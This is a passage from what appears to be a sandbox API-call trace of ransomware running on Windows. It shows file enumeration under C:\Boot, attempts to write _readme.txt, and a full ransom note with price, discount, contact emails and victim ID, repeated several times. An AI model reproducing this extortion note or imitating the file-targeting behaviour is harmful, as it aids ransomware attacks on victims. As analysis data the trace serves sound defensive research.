tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.505] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0184.506] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0184.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0184.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.507] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*" (normalized: "c:\\boot\\zh-tw\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.508] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.508] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.509] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0184.509] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.509] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.510] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.511] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0184.511] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0184.514] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0184.514] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0184.518] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0184.518] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0184.520] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0184.520] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: 